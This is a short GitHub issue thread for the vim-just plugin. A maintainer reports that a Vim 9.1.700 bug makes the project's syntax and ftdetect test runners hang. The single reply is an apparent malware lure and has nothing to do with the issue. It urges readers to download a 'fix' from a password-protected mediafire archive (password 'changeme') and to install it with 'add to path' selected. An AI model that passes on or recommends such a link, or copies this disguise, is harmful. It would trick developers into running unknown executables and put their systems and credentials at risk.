### ISSUE TITLE
Vim 9.1.700 bug causes test runners to hang

### ISSUE THREAD

**Issue by laniakea64** [NoahTheDuke/vim-just#107]
When attempting to run the tests with Vim 9.1.700, which has the bug reported to us in https://github.com/NoahTheDuke/vim-just/issues/106 , our test runners hang.  Both syntax and ftdetect test runners are affected.

While I wouldn't expect all tests to pass in that case, we should investigate whether the hang can be avoided.

**Comment by goncastrum** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx
